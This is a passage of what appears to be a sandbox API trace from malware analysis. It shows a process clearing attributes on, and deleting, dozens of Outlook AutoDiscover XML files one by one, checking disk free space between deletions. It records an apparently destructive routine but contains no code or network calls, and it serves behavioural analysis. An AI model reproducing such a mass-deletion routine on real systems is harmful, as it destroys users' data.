lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML", dwFileAttributes=0x80) returned 1 [0078.098] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nvbell.net.xml")) returned 1 [0078.100] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML", dwFileAttributes=0x80) returned 1 [0078.105] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\pacbell.net.xml")) returned 1 [0078.108] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML", dwFileAttributes=0x80) returned 1 [0078.112] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PRODIGY.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\prodigy.net.xml")) returned 1 [0078.115] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML", dwFileAttributes=0x80) returned 1 [0078.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\rogers.com.xml")) returned 1 [0078.359] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML", dwFileAttributes=0x80) returned 1 [0078.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\sbcglobal.net.xml")) returned 1 [0078.369] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.373] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML", dwFileAttributes=0x80) returned 1 [0078.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\snet.net.xml")) returned 1 [0078.376] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML", dwFileAttributes=0x80) returned 1 [0078.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\swbell.net.xml")) returned 1 [0078.383] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML", dwFileAttributes=0x80) returned 1 [0078.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\talk21.com.xml")) returned 1 [0078.393] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML", dwFileAttributes=0x80) returned 1 [0078.397] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\wans.net.xml")) returned 1 [0078.400] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML", dwFileAttributes=0x80) returned 1 [0078.404] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ca.xml")) returned 1 [0078.407] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.411] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML", dwFileAttributes=0x80) returned 1 [0078.411] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.id.xml")) returned 1 [0078.414] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML", dwFileAttributes=0x80) returned 1 [0078.419] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.in.xml")) returned 1 [0078.421] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML", dwFileAttributes=0x80) returned 1 [0078.425] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.jp.xml")) returned 1 [0078.428] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.436] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML", dwFileAttributes=0x80) returned 1 [0078.436] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.kr.xml")) returned 1 [0078.439] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML", dwFileAttributes=0x80) returned 1 [0078.444] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.nz.xml")) returned 1 [0078.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.451] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML", dwFileAttributes=0x80) returned 1 [0078.451] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.th.xml")) returned 1 [0078.454] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML", dwFileAttributes=0x80) returned 1 [0078.459] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.uk.xml")) returned 1 [0078.462] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML", dwFileAttributes=0x80) returned 1 [0078.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ar.xml")) returned 1 [0078.468] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.473] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML", dwFileAttributes=0x80) returned 1 [0078.473] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.au.xml")) returned 1 [0078.475] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML", dwFileAttributes=0x80) returned 1 [0078.479] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.br.xml")) returned 1 [0078.482] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML", dwFileAttributes=0x80) returned 1 [0078.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.cn.xml")) returned 1 [0078.489] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML", dwFileAttributes=0x80) returned 1 [0078.493] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.hk.xml")) returned 1 [0078.496] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.500] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML", dwFileAttributes=0x80) returned 1 [0078.500] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.mx.xml")) returned 1 [0078.505] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML", dwFileAttributes=0x80) returned 1 [0078.525] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.my.xml")) returned 1 [0078.530] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML", dwFileAttributes=0x80) returned 1 [0078.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ph.xml")) returned 1 [0078.538] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML", dwFileAttributes=0x80) returned 1 [0078.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.sg.xml")) returned 1 [0078.545] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML", dwFileAttributes=0x80) returned 1 [0078.549] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.tw.xml")) returned 1 [0078.552] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML", dwFileAttributes=0x80) returned 1 [0078.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.vn.xml")) returned 1 [0078.559] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML", dwFileAttributes=0x80) returned 1 [0078.564] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.xml")) returned 1 [0078.569] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML", dwFileAttributes=0x80) returned 1 [0078.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.de.xml")) returned 1 [0078.576] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML", dwFileAttributes=0x80) returned 1 [0078.581] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.es.xml")) returned 1 [0078.584] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML", dwFileAttributes=0x80) returned 1 [0078.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.fr.xml")) returned 1 [0078.592] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML", dwFileAttributes=0x80) returned 1 [0078.596] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml")) returned 1 [0078.599] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML", dwFileAttributes=0x80) returned 1 [0078.604] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml")) returned 1 [0078.606] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML", dwFileAttributes=0x80) returned 1 [0078.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml")) returned 1 [0078.613] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML", dwFileAttributes=0x80) returned 1 [0078.617] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml")) returned 1 [0078.621] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0078.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML", dwFileAttributes=0x80) returned 1 [0078.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml")) returned 1 [0078.628] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 